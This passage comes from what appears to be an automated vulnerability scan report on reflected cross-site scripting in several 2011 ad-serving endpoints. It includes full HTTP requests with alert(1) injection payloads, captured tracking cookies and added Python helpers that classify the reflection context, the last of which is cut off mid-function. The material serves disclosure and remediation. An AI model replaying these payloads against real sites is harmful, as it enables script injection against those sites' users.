GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=1932252b'-alert(1)-'d4dfa0675de&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:46 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=1932252b'-alert(1)-'d4dfa0675de&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

3.28. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b40'-alert(1)-'bf51ba85aa was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response. As in 3.27, the response is application/x-javascript intended for a <script> tag, so the spliced-in alert(1) runs in the including page. Note also that admeld_callback supplies the base of the sync pixel URL, so the host that receives external_user_id is whatever the caller provides.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the callback should be restricted to an allow-list of known match endpoints, or at least to a fixed set of hosts, which removes both the script injection and the caller-chosen destination for external_user_id; whatever is emitted should still pass through a JavaScript-string encoder rather than being placed between existing quotes.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchc3b40'-alert(1)-'bf51ba85aa HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:51 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/matchc3b40'-alert(1)-'bf51ba85aa?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

3.29. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the response body as plain text. The payload 20009<script>alert(1)</script>eac34010d7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response, which is an HTTP 400 error page with no Content-Type header. The 400 status does not stop a browser from rendering the body; whether the body is treated as HTML depends on content sniffing, so the echo is only exploitable where the browser sniffs it as HTML. Sending an explicit Content-Type: text/plain with X-Content-Type-Options: nosniff, or HTML-encoding the echoed path, would close it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269720009<script>alert(1)</script>eac34010d7b?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; 
fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 09 May 2011 14:00:52 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269720009<script>alert(1)</script>eac34010d7b

3.30. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is reflected into a JavaScript response (Content-Type: application/x-javascript), not into HTML: it becomes the name of the function the script calls, in the JSONP-style form COMSCORE.BMX.Broker.handleInteraction...(""). The payload acdc2<script>alert(1)</script>2478b25a1c1 was submitted in the func parameter. This input was echoed unmodified in the application's response. A <script> tag in that position is a JavaScript syntax error, so this probe shows an unfiltered echo rather than a working injection; the security-relevant point is that the parameter is emitted as executable code, so any value that is valid JavaScript would run in a page that loads this URL in a script tag. The callback name should be restricted to an allow-list, or at least to identifier characters.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionacdc2<script>alert(1)</script>2478b25a1c1&n=ar_int_p97174789&1304949596809 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304949586%2E006%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:58 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionacdc2<script>alert(1)</script>2478b25a1c1("");

3.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into a JavaScript response (Content-Type: application/x-javascript) inside a double-quoted string literal in the COMSCORE.beacon({...}) call, not between HTML tags. The payload df383<script>alert(1)</script>19276a1a2c0 was submitted in the c1 parameter. This input was echoed unmodified in the application's response. A <script> tag inside a JavaScript string is inert, so this probe shows only that the value is echoed unfiltered; breaking out would need an unescaped double quote, backslash or line terminator to survive, which this test does not establish. The script is designed to be loaded with a <script src> tag, so a confirmed breakout would execute in any page that includes the URL.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7df383<script>alert(1)</script>19276a1a2c0&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:46 GMT
Date: Mon, 09 May 2011 14:00:46 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7df383<script>alert(1)</script>19276a1a2c0", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
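Several findings in this section describe the reflection as "plain text between tags" although the response is a JavaScript file, and one (3.29) is an error page with no Content-Type at all. The following Python is an added triage helper, not part of the report or of any scanner: given a raw response and the probe string, it checks that the probe is echoed verbatim, then uses the Content-Type and a small quote/comment tracker over the text before the echo to say whether the probe landed in HTML, in executable JavaScript, or inside a JavaScript string literal, which is what decides whether a <script> probe means anything. The embedded responses are abridged copies of the captures from 3.27, 3.29, 3.30 and this finding; the same check applies unchanged to the remaining beacon.js parameters.

```python
"""Context triage for reflected probes. Added example, not code from the
report or from any scanner: it takes a raw HTTP response and the probe string,
checks that the probe is echoed verbatim, and works out from the Content-Type
and the text before the echo whether the probe sits in HTML, in executable
JavaScript, or inside a JavaScript string literal. The sample responses are
abridged copies of the captures in findings 3.27, 3.29, 3.30 and 3.31
(headers trimmed, bodies cut to the reflection point); they are constructed
test inputs, not live responses."""

ADMELD_3_27 = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/x-javascript\r\n\r\n"
    "document.write('<img src=\"http://tag.admeld.com/match?admeld_adprovider_id="
    "1932252b'-alert(1)-'d4dfa0675de&expiration=0\" width=\"0\"/>');")
ADBRITE_3_29 = (
    "HTTP/1.1 400 Bad Request\r\nServer: XPEHb/1.0\r\nContent-Length: 78\r\n\r\n"
    "Unsupported URL: /adserver/vdi/74269720009<script>alert(1)</script>eac34010d7b")
VOICEFIVE_3_30 = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/x-javascript\r\n\r\n"
    "COMSCORE.BMX.Broker.handleInteractionacdc2<script>alert(1)</script>2478b25a1c1(\"\");")
BEACON_3_31 = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/x-javascript\r\n\r\n"
    "if(typeof COMSCORE==\"undefined\"){var COMSCORE={}}\n"
    "COMSCORE.beacon({c1:\"7df383<script>alert(1)</script>19276a1a2c0\", c2:\"5964888\"});")


def parse_response(raw):
    """Split a raw response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def js_string_state(prefix):
    """Return the quote character if `prefix` ends inside a JS string literal,
    else None. Tracks backslash escapes and // and /* */ comments; enough for
    the flat ad-tag code in these responses (no template literals or regex)."""
    quote, i = None, 0
    while i < len(prefix):
        c = prefix[i]
        if quote:
            if c == "\\":
                i += 1          # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'":
            quote = c
        elif prefix.startswith("//", i):
            nl = prefix.find("\n", i)
            i = len(prefix) if nl < 0 else nl
        elif prefix.startswith("/*", i):
            end = prefix.find("*/", i + 2)
            i = len(prefix) if end < 0 else end + 1
        i += 1
    return quote


def classify(raw, probe):
    """Describe where `probe` lands in the response and what that means for
    the probe shape the report used."""
    status, headers, body = parse_response(raw)
    pos = body.find(probe)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    out = {"status": status, "content_type": ctype or None, "reflected": pos >= 0}
    if pos < 0:
        out["context"] = None
        return out
    if not ctype:
        out["context"] = "html-sniffed"
        out["note"] = "no Content-Type: browser sniffing decides whether this renders as HTML"
    elif ctype in ("text/html", "application/xhtml+xml"):
        out["context"], out["note"] = "html", "tag payloads render as markup"
    elif "javascript" in ctype or ctype == "application/ecmascript":
        q = js_string_state(body[:pos])
        if q:
            out["context"] = "js-string" + q
            out["note"] = ("inside a %s-quoted JS string: tags are inert, a breakout "
                           "needs an unescaped %s or backslash" % (q, q))
        else:
            out["context"] = "js-code"
            out["note"] = "executable JS outside any string: tags are a syntax error"
    else:
        out["context"], out["note"] = "other", "not rendered as HTML or script: " + ctype
    return out


def triage():
    """Run the four report captures through classify()."""
    cases = [("3.27 admeld", ADMELD_3_27, "2252b'-alert(1)-'d4dfa0675de"),
             ("3.29 adbrite", ADBRITE_3_29, "20009<script>alert(1)</script>eac34010d7b"),
             ("3.30 voicefive", VOICEFIVE_3_30, "acdc2<script>alert(1)</script>2478b25a1c1"),
             ("3.31 beacon.js", BEACON_3_31, "df383<script>alert(1)</script>19276a1a2c0")]
    return {name: classify(raw, probe) for name, raw, probe in cases}


if __name__ == "__main__":
    for name, r in triage().items():
        print("%-16s %-12s %s" % (name, r["context"], r["note"]))
```

The quote tracker is deliberately small: it only needs to decide whether the echo point is inside a string, so the output for 3.27 (single-quoted string, and the probe does carry a single quote) differs from 3.31 (double-quoted string, probe carries none), and 3.30 comes out as executable code rather than a string at all. Feeding the full captured body rather than the abridged copy gives the same answer as long as no quote is left open before the echo.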



3.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into a JavaScript response (Content-Type: application/x-javascript) inside a double-quoted string literal in the COMSCORE.beacon({...}) call, not between HTML tags. The payload a74ed<script>alert(1)</script>5f0e5f320d7 was submitted in the c15 parameter. This input was echoed unmodified in the application's response. Because a <script> tag inside a JavaScript string is inert, this probe shows only an unfiltered echo; exploitability depends on whether a double quote, backslash or line terminator in the value survives, which this test does not establish.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=a74ed<script>alert(1)</script>5f0e5f320d7&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"a74ed<script>alert(1)</script>5f0e5f320d7", c16:"", r:""});



3.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into a JavaScript response (Content-Type: application/x-javascript) inside a double-quoted string literal in the COMSCORE.beacon({...}) call, not between HTML tags. The payload ee3b1<script>alert(1)</script>a730d899c17 was submitted in the c2 parameter. This input was echoed unmodified in the application's response. Because a <script> tag inside a JavaScript string is inert, this probe shows only an unfiltered echo; exploitability depends on whether a double quote, backslash or line terminator in the value survives, which this test does not establish.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888ee3b1<script>alert(1)</script>a730d899c17&c3=2&c4=&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:51 GMT
Date: Mon, 09 May 2011 14:00:51 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888ee3b1<script>alert(1)</script>a730d899c17", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into a JavaScript response (Content-Type: application/x-javascript) inside a double-quoted string literal in the COMSCORE.beacon({...}) call, not between HTML tags. The payload febf6<script>alert(1)</script>b19c58ceea3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response. Because a <script> tag inside a JavaScript string is inert, this probe shows only an unfiltered echo; exploitability depends on whether a double quote, backslash or line terminator in the value survives, which this test does not establish.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2febf6<script>alert(1)</script>b19c58ceea3&c4=&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2febf6<script>alert(1)</script>b19c58ceea3", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
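Scanner templates describe reflections like the ones in this report as "plain text between tags". For a script resource the question that actually decides exploitability is the lexical context at the reflection point: inside a JavaScript string literal, a bare identifier, an unquoted numeric slot, or real HTML text. The Python below is an added triage helper; it is not part of the original report and not code from any of the products named in it. It lexes the response up to the first occurrence of the reflected marker, reports the context, and then says whether the reflected bytes are parsed as code at all. The response fragments are copied from entries 3.34, 3.38 and 3.44 of this report; the pulse360 (3.47) and HTML samples are constructed, because the report does not show those bodies. Function and sample names are the example's own.

```python
import re

JS_TYPES = ("javascript", "ecmascript")


def js_state_at(body: str, index: int) -> str:
    """Lex body[:index] as JavaScript and report the state at index: 'code',
    'dq-string', 'sq-string', 'template', 'line-comment' or 'block-comment'.
    Regex literals are not tracked; that is adequate for triaging scanner hits."""
    state = "code"
    i = 0
    while i < index:
        ch = body[i]
        nxt = body[i + 1] if i + 1 < len(body) else ""
        if state == "code":
            if ch == '"':
                state = "dq-string"
            elif ch == "'":
                state = "sq-string"
            elif ch == "`":
                state = "template"
            elif ch == "/" and nxt == "/":
                state, i = "line-comment", i + 1
            elif ch == "/" and nxt == "*":
                state, i = "block-comment", i + 1
        elif state in ("dq-string", "sq-string", "template"):
            closer = {"dq-string": '"', "sq-string": "'", "template": "`"}[state]
            if ch == "\\":
                i += 1          # an escaped character never closes the literal
            elif ch == closer:
                state = "code"
        elif state == "line-comment" and ch == "\n":
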